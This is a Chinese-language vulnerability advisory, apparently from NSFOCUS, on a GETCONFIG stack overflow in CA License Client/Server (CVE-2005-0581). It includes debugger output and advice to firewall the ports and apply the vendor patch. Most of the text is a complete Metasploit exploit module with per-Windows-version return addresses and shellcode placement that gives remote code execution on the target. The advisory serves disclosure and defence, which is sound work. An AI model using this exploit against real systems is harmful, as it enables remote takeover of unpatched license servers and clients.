安全研究

安全漏洞
CA License Client/Server GETCONFIG请求缓冲区溢出漏洞

发布日期:2005-03-02
更新日期:2005-03-03

受影响系统:
Computer Associates License Server 0.1.0.15
Computer Associates License Client 0.1.0.15
描述:
BUGTRAQ  ID: 12705
CVE(CAN) ID: CVE-2005-0581

Computer Associates License Client/Server应用程序允许CA产品在网络上注册其许可证。大多数CA软件发布中都捆绑了License Client和Server。

CA License Client/Server对GETCONFIG请求参数的处理上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞在服务器或客户端上执行任意指令。

漏洞的起因是对GETCONFIG请求中用户提供的值所执行的不充分的边界检查。在正常的操作中,License Server会向连接客户端发送GETCONFIG请求,然后客户端有选择性的用类似的GETCONFIG报文响应。但服务端和客户端都没能正确检查GETCONFIG报文最后一个参数的边界,导致下文所示的栈溢出。

CA License Server在SEH覆盖后的Ollydbg输出如下:

EAX 00000001
ECX 7C90FB71 ntdll.7C90FB71
EDX 0000000D
EBX 00E4E053 ASCII "GETCONFIG"
ESP 00E2FC9C
EBP 00E4E050 ASCII "A0"
ESI 00E2FD18
EDI 00E4E05D ASCII "SELF"
EIP DEADC0DE

Log data, item 0
Address=DEADC0DE
Message=Access violation when executing [DEADC0DE]

<*来源:eEye (info@eEye.com
        Williams, James K (james.williams@ca.com
  
  链接:http://www.eeye.com/html/research/advisories/AD20050302.html
        http://marc.theaimsgroup.com/?l=bugtraq&m=110979326828704&w=2
        http://supportconnectw.ca.com/public/ca_common_docs/security_notice.asp
        www.idefense.com/application/poi/display?id=213
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::calicserv_getconfig;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
    'Name'  => 'CA License Server GETCONFIG Overflow',
    'Version'  => '$Revision: 1.12 $',
    'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
    'Arch'  => [ 'x86' ],
    'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
    'Priv'  => 1,
    'AutoOpts'  => { 'EXITFUNC' => 'thread' },
    'UserOpts'  => {
        'RHOST' => [1, 'ADDR', 'The target address'],
        'RPORT' => [1, 'PORT', 'The target port', 10202],
      },

    'Payload' =>
      {
        'Space'        => 600,
        'BadChars'    => "\x00\x20",
        'Prepend'    => "\x81\xc4\x54\xf2\xff\xff",
        'Keys'        => ['+ws2ord'],
      },

    'Description'  => Pex::Text::Freeform(qq{
        This module exploits an vulnerability in the CA License Server
        network service. This is a simple stack overflow and just one of
        many serious problems with this software.
}),

    'Refs'    =>
      [
          ['OSVDB', '14322'],
        ['BID', '12705'],
        ['CVE', '005-0581'],
        ['URL', 'http://www.idefense.com/application/poi/display?id=213&type=vulnerabilities'],
        ['MIL', '18'],        
      ],

    'Targets' => [

        # As much as I would like to return back to the DLL or EXE,
        # all of those modules have a leading NULL in the
        # loaded @ address :(

        # name, jmp esi, writable, jmp edi
        ['Automatic', 0],
        ['Windows 2000 English',        0x750217ae, 0x7ffde0cc, 0x75021421], # ws2help.dll esi + peb + edi
        ['Windows XP English SP0-1',    0x71aa16e5, 0x7ffde0cc, 0x71aa19e8], # ws2help.dll esi + peb + edi
        ['Windows XP English SP2',        0x71aa1b22, 0x71aa5001, 0x71aa1e08], # ws2help.dll esi + .data + edi
        ['Windows 2003 English SP0',    0x71bf175f, 0x7ffde0cc, 0x71bf1a2c], # ws2help.dll esi + peb + edi
      ],
    'Keys'  => ['calicense'],

    'DisclosureDate' => 'Mar 02 2005',
  };

sub new {
    my $class = shift;
    my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
    return($self);
}

sub Check {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $data = $self->GetConfig($target_host, $target_port);
    if (! $data) {
        $self->PrintLine("[*] Could not read remote configuration");
        return $self->CheckCode('Connect');
    }

    $self->PrintLine("[*] License Server: $data");
    return $self->CheckCode('Detected');
}

sub Exploit {
    my $self = shift;
    my $target_host = $self->GetVar('RHOST');
    my $target_port = $self->GetVar('RPORT');
    my $target_idx  = $self->GetVar('TARGET');
    my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
    my $target = $self->Targets->[$target_idx];
    
    if (! $self->InitNops(128)) {
        $self->PrintLine("[*] Failed to initialize the nop module.");
        return;
    }
        
    if ($target_idx == 0) {
        my $data = $self->GetConfig($target_host, $target_port);
        if ($data =~ m/OS\<([^\>]+)/) {
            my $os = $1;
            $os =~ s/_NT//g;
            $os =~ s/5\.1/XP/;
            $os =~ s/5\.2/2003/;
            $os =~ s/5\.0/2000/;
            $os =~ s/4\.0/NT 4.0/;

            my @targs;
            for (1 .. (scalar(@{$self->Targets})-1)) {
                if (index($self->Targets->[$_]->[0], $os) != -1) {
                    push @targs, $_;
                }
            }

            if (scalar(@targs) > 1) {
                $self->PrintLine("[*] Multiple possible targets:");
                foreach (@targs) {
                    $self->PrintLine("[*]  $_\t".$self->Targets->[$_]->[0]);
                }
                return;
            }

            if (scalar(@targs) == 1) {
                $target = $self->Targets->[$targs[0]];
            }

            if (! scalar(@targs)) {
                $self->PrintLine("[*] No matching target for $os");
                return;
            }

        } else {
            $self->PrintLine("[*] Could not determine the remote OS automatically");
            return;
        }
    }

    $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    # Read the initial greeting from the license server
    my $res = $s->Recv(-1, 1);
    if (! $res || $res !~ /GETCONFIG/) {
        $self->PrintLine("[*] The server did not return the expected greeting");
        return;
    }

    my $boom = $self->MakeNops(900);
    
    ## exploits two different versions at once >:-)
    # 144 -> return address of esi points to string middle
    # 196 -> return address of edi points to string beginning    
    # 148 -> avoid exception by patching with writable address
    # 928 -> seh handler (not useful under XP SP2)
    
    substr($boom, 142, 2, "\xeb\x08");                    # jmp over addresses
    substr($boom, 144, 4, pack('V', $target->[1]));     # jmp esi
    substr($boom, 148, 4, pack('V', $target->[2]));     # writable address
    substr($boom, 194, 2, "\xeb\x04");                    # jmp over address
    substr($boom, 196, 4, pack('V', $target->[3]));        # jmp edi
    
    substr($boom, 272, length($shellcode), $shellcode);

    my $req = "A0 GETCONFIG SELF $boom<EOM>";

    $self->PrintLine("[*] Sending " .length($req) . " bytes to remote host.");
    $s->Send($req);

    return;
}

sub GetConfig {
    my $self = shift;
    my $target_host = shift;
    my $target_port = shift;

    my $s = Msf::Socket::Tcp->new
      (
        'PeerAddr'  => $target_host,
        'PeerPort'  => $target_port,
        'LocalPort' => $self->GetVar('CPORT'),
        'SSL'       => $self->GetVar('SSL'),
      );

    if ($s->IsError) {
        $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
        return;
    }

    # Recieve the message that is first sent
    $s->Recv(-1, 1);

    # Ask for the configuration info
    $s->Send("A0 GETCONFIG SELF 0<EOM>");
    my $res = $s->Recv(-1, 2);

    # Close the socket
    $s->Close;

    # Return the data
    return $res;
}

1;

__DATA__
eTrust: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.2>OLFFILE<0 0 0>SERVER<RMT>VERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINE<PC_686_1_2084>CHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1><EOM>
BrightStor: A0 GCR HOSTNAME<XXX>HARDWARE<xxxxxx>LOCALE<English>IDENT1<unknown>IDENT2<unknown>IDENT3<unknown>IDENT4<unknown>OS<Windows_NT 5.1>OLFFILE<0 0 0>SERVER<RMT>VERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINE<DESKTOP>CHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00><EOM>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 使用防火墙,仅允许可信任的主机连接到Computer Associates License Server和Client端口上。

厂商补丁:

Computer Associates
-------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://supportconnectw.ca.com/public/reglic/downloads/licensepatch.asp#alp

浏览次数:4788
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障